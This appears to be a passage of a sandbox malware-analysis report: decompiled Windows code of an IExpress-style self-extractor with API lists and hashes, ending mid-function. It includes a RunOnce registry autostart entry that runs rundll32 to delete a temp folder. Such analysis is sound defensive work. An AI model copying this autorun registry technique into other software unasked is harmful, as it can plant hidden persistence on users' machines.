                                                                                                                                                                                                                                                0x010e42ce

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010E4236
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010E424C
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010E4263
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010E427A
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,010E88C0,?,00000001), ref: 010E429F
                                                                                                                                                                                                                                                • CharPrevA.USER32(010E88C0,021D1181,?,00000001), ref: 010E42C2
                                                                                                                                                                                                                                                • CharPrevA.USER32(010E88C0,00000000,?,00000001), ref: 010E42D6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010E4391
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010E43A5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                • Opcode ID: ad80f56a3e8faefc51554de6a02f56c98bf753cb3afefae5156463bd93df60b5
                                                                                                                                                                                                                                                • Instruction ID: 1e8417f2b3ce7bb1c750db8e4e6ed7a0506f1304daf51aa05c7828971f8009f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad80f56a3e8faefc51554de6a02f56c98bf753cb3afefae5156463bd93df60b5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3941B574A00204AFE7619F7BE88C96EBFF4EB49744F04819EEAC1EB245C77988018761
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                                				char _v576;
                                                                                                                                                                                                                                                				void* _v580;
                                                                                                                                                                                                                                                				struct HWND__* _v584;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t34;
                                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                                                                				int _t64;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				intOrPtr* _t67;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                				intOrPtr* _t73;
                                                                                                                                                                                                                                                				intOrPtr* _t76;
                                                                                                                                                                                                                                                				intOrPtr* _t77;
                                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                                				void* _t81;
                                                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                                                				intOrPtr* _t84;
                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                				signed int _t89;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t75 = __edx;
                                                                                                                                                                                                                                                				_t34 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                                				_v584 = __ecx;
                                                                                                                                                                                                                                                				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                                				_t67 = _a4;
                                                                                                                                                                                                                                                				_t69 = 0xd;
                                                                                                                                                                                                                                                				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                                				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                                				_v580 = _t37;
                                                                                                                                                                                                                                                				asm("movsb");
                                                                                                                                                                                                                                                				if(( *0x10e8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                					_t39 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_v576 = 0;
                                                                                                                                                                                                                                                					LoadStringA( *0x10e9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                                					if(_v576 != 0) {
                                                                                                                                                                                                                                                						_t73 =  &_v576;
                                                                                                                                                                                                                                                						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                                						_t75 = _t16;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t43 =  *_t73;
                                                                                                                                                                                                                                                							_t73 = _t73 + 1;
                                                                                                                                                                                                                                                						} while (_t43 != 0);
                                                                                                                                                                                                                                                						_t84 = _v580;
                                                                                                                                                                                                                                                						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                                						if(_t84 == 0) {
                                                                                                                                                                                                                                                							if(_t67 == 0) {
                                                                                                                                                                                                                                                								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                                								_t83 = _t27;
                                                                                                                                                                                                                                                								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                                								_t80 = _t44;
                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t75 = _t83;
                                                                                                                                                                                                                                                									_t74 = _t80;
                                                                                                                                                                                                                                                									E010E1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t76 = _t67;
                                                                                                                                                                                                                                                								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                                								_t85 = _t24;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t55 =  *_t76;
                                                                                                                                                                                                                                                									_t76 = _t76 + 1;
                                                                                                                                                                                                                                                								} while (_t55 != 0);
                                                                                                                                                                                                                                                								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                                								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                                								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                                								_t80 = _t44;
                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E010E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t77 = _t67;
                                                                                                                                                                                                                                                							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                                							_t81 = _t18;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t58 =  *_t77;
                                                                                                                                                                                                                                                								_t77 = _t77 + 1;
                                                                                                                                                                                                                                                							} while (_t58 != 0);
                                                                                                                                                                                                                                                							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                                							_t82 = _t84 + 1;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t59 =  *_t84;
                                                                                                                                                                                                                                                								_t84 = _t84 + 1;
                                                                                                                                                                                                                                                							} while (_t59 != 0);
                                                                                                                                                                                                                                                							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                                							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                                							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                                							_t80 = _t44;
                                                                                                                                                                                                                                                							if(_t80 == 0) {
                                                                                                                                                                                                                                                								goto L6;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_push(_v580);
                                                                                                                                                                                                                                                								E010E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                                								L23:
                                                                                                                                                                                                                                                								MessageBeep(_a12);
                                                                                                                                                                                                                                                								if(E010E681F(_t67) == 0) {
                                                                                                                                                                                                                                                									L25:
                                                                                                                                                                                                                                                									_t49 = 0x10000;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t54 = E010E67C9(_t74, _t74);
                                                                                                                                                                                                                                                									_t49 = 0x190000;
                                                                                                                                                                                                                                                									if(_t54 == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                                                                                                                                                                                                								_t83 = _t52;
                                                                                                                                                                                                                                                								LocalFree(_t80);
                                                                                                                                                                                                                                                								_t39 = _t52;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(E010E681F(_t67) == 0) {
                                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                                							_t64 = 0x10010;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t66 = E010E67C9(0, 0);
                                                                                                                                                                                                                                                							_t64 = 0x190010;
                                                                                                                                                                                                                                                							if(_t66 == 0) {
                                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                                						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                                			}



































                                                                                                                                                                                                                                                0x010e457e
                                                                                                                                                                                                                                                0x010e457e
                                                                                                                                                                                                                                                0x010e4580
                                                                                                                                                                                                                                                0x010e4580
                                                                                                                                                                                                                                                0x010e4583
                                                                                                                                                                                                                                                0x010e4583
                                                                                                                                                                                                                                                0x010e4585
                                                                                                                                                                                                                                                0x010e4586
                                                                                                                                                                                                                                                0x010e458a
                                                                                                                                                                                                                                                0x010e458c
                                                                                                                                                                                                                                                0x010e458f
                                                                                                                                                                                                                                                0x010e458f
                                                                                                                                                                                                                                                0x010e4591
                                                                                                                                                                                                                                                0x010e4592
                                                                                                                                                                                                                                                0x010e459b
                                                                                                                                                                                                                                                0x010e459e
                                                                                                                                                                                                                                                0x010e45a3
                                                                                                                                                                                                                                                0x010e45a9
                                                                                                                                                                                                                                                0x010e45ad
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e45af
                                                                                                                                                                                                                                                0x010e45af
                                                                                                                                                                                                                                                0x010e45bf
                                                                                                                                                                                                                                                0x010e462d
                                                                                                                                                                                                                                                0x010e4630
                                                                                                                                                                                                                                                0x010e463d
                                                                                                                                                                                                                                                0x010e464e
                                                                                                                                                                                                                                                0x010e464e
                                                                                                                                                                                                                                                0x010e463f
                                                                                                                                                                                                                                                0x010e4640
                                                                                                                                                                                                                                                0x010e4647
                                                                                                                                                                                                                                                0x010e464c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e464c
                                                                                                                                                                                                                                                0x010e4666
                                                                                                                                                                                                                                                0x010e466d
                                                                                                                                                                                                                                                0x010e466f
                                                                                                                                                                                                                                                0x010e4675
                                                                                                                                                                                                                                                0x010e4675
                                                                                                                                                                                                                                                0x010e45ad
                                                                                                                                                                                                                                                0x010e4527
                                                                                                                                                                                                                                                0x010e452e
                                                                                                                                                                                                                                                0x010e453f
                                                                                                                                                                                                                                                0x010e453f
                                                                                                                                                                                                                                                0x010e4530
                                                                                                                                                                                                                                                0x010e4531
                                                                                                                                                                                                                                                0x010e4538
                                                                                                                                                                                                                                                0x010e453d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e453d
                                                                                                                                                                                                                                                0x010e4554
                                                                                                                                                                                                                                                0x010e455a
                                                                                                                                                                                                                                                0x010e455a
                                                                                                                                                                                                                                                0x010e455a
                                                                                                                                                                                                                                                0x010e4525
                                                                                                                                                                                                                                                0x010e468c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 010E45A3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 010E45E3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 010E460D
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 010E4630
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 010E4666
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 010E466F
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010E686E
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: GetSystemMetrics.USER32(0000004A), ref: 010E68A7
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010E68CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,?,0000000C), ref: 010E68F4
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: RegCloseKey.ADVAPI32(?), ref: 010E6902
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                                • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                                • Opcode ID: 2362a7b513661d46fbd15a98280cb5464b531f3bcd50bd5d1030893e623988fd
                                                                                                                                                                                                                                                • Instruction ID: cb78bf52fc3f647615a0a77254566dad28d9f9eb6bceb1ac941b5de51c49496a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2362a7b513661d46fbd15a98280cb5464b531f3bcd50bd5d1030893e623988fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B510472A00215AFDB219E2ADC4CBAA7BE8EF49700F0441D9EDC9E7205DB36DD05CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v269;
                                                                                                                                                                                                                                                				CHAR* _v276;
                                                                                                                                                                                                                                                				int _v280;
                                                                                                                                                                                                                                                				void* _v284;
                                                                                                                                                                                                                                                				int _v288;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t23;
	intOrPtr _t34;
	int _t45;
	int* _t50;
	CHAR* _t52;
	CHAR* _t61;
	char* _t62;
	int _t63;
	CHAR* _t64;
	signed int _t65;

	_t52 = __ecx;
	_t23 =  *0x10e8004; // 0x71a8563c
	_v8 = _t23 ^ _t65;
	_t62 = _a4;
	_t50 = 0;
	_t61 = __ecx;
	_v276 = _t62;
	 *((char*)(__ecx)) = 0;
	if( *_t62 != 0x23) {
		_t63 = 0x104;
		goto L14;
	} else {
		_t64 = _t62 + 1;
		_v269 = CharUpperA( *_t64);
		_v276 = CharNextA(CharNextA(_t64));
		_t63 = 0x104;
		_t34 = _v269;
		if(_t34 == 0x53) {
			L14:
			GetSystemDirectoryA(_t61, _t63);
			goto L15;
		} else {
			if(_t34 == 0x57) {
				GetWindowsDirectoryA(_t61, 0x104);
				goto L16;
			} else {
				_push(_t52);
				_v288 = 0x104;
				E010E1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
				_t59 = 0x104;
				E010E658A( &_v268, 0x104, _v276);
				if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
					L16:
					_t59 = _t63;
					E010E658A(_t61, _t63, _v276);
				} else {
					if(RegQueryValueExA(_v284, 0x10e1140, 0,  &_v280, _t61,  &_v288) == 0) {
						_t45 = _v280;
						if(_t45 != 2) {
							L9:
							if(_t45 == 1) {
								goto L10;
							}
						} else {
							if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
								_t45 = _v280;
								goto L9;
							} else {
								_t59 = 0x104;
								E010E1680(_t61, 0x104,  &_v268);
								L10:
								_t50 = 1;
							}
						}
					}
					RegCloseKey(_v284);
					L15:
					if(_t50 == 0) {
						goto L16;
					}
				}
			}
		}
	}
	return E010E6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
}























                                                                                                                                                                                                                                                0x010e28e5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperA.USER32(71A8563C,00000000,00000000,00000000), ref: 010E27A8
                                                                                                                                                                                                                                                • CharNextA.USER32(0000054D), ref: 010E27B5
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 010E27BC
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2829
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2852
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2870
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E28A0
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010E28AA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 010E28B9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010E27E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                • Opcode ID: fb82445c74c5915658971610231e57e79724568a73cb72334f8445f8789be33c
                                                                                                                                                                                                                                                • Instruction ID: a8898992a58c37551a9b7d7ca8384e5672c5a538c612aa0fffad0cb81eba2002
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb82445c74c5915658971610231e57e79724568a73cb72334f8445f8789be33c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C841BF71A01128AFDB659B669C89AFE7BFCEB59700F0040E9F5C9D7104CB758E858FA0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                			E010E2267() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v836;
                                                                                                                                                                                                                                                				void* _v840;
                                                                                                                                                                                                                                                				int _v844;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                				intOrPtr* _t42;
                                                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t19 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                                				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                                				if( *0x10e8530 != 0) {
                                                                                                                                                                                                                                                					_push(_t49);
                                                                                                                                                                                                                                                					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                                						_push(_t38);
                                                                                                                                                                                                                                                						_v844 = 0x238;
                                                                                                                                                                                                                                                						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                                							_push(_t47);
                                                                                                                                                                                                                                                							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                                							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                								E010E658A( &_v268, 0x104, 0x10e1140);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                                                                							E010E171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                                							_t42 =  &_v836;
                                                                                                                                                                                                                                                							_t45 = _t42 + 1;
                                                                                                                                                                                                                                                							_pop(_t47);
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t33 =  *_t42;
                                                                                                                                                                                                                                                								_t42 = _t42 + 1;
                                                                                                                                                                                                                                                							} while (_t33 != 0);
                                                                                                                                                                                                                                                							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                                						_pop(_t38);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_pop(_t49);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010E22A3
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 010E22D8
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E22F5
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 010E2305
                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010E236E
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 010E237A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010E2299
                                                                                                                                                                                                                                                • wextract_cleanup3, xrefs: 010E227C, 010E22CD, 010E2363
                                                                                                                                                                                                                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010E232D
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010E2321
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
                                                                                                                                                                                                                                                • API String ID: 3027380567-1707933020
                                                                                                                                                                                                                                                • Opcode ID: 7d5921f6fcd41dde1b75c8ffcdd0617358a28680dd670a22d5f9bac8957245e1
                                                                                                                                                                                                                                                • Instruction ID: 70048e7a767b88be1c9534ebe36549911bcb1f9ea0c9ffa9f52df40c3a7b32c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d5921f6fcd41dde1b75c8ffcdd0617358a28680dd670a22d5f9bac8957245e1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4331B671A00218AFDB719A67DC4CFEA7BFCEB14740F0401EAB58DAA005DA75AB84CF50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                                			E010E3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                                				struct HWND__* _t16;
                                                                                                                                                                                                                                                				struct HWND__* _t33;
                                                                                                                                                                                                                                                				struct HWND__* _t34;
                                                                                                                                                                                                                                                
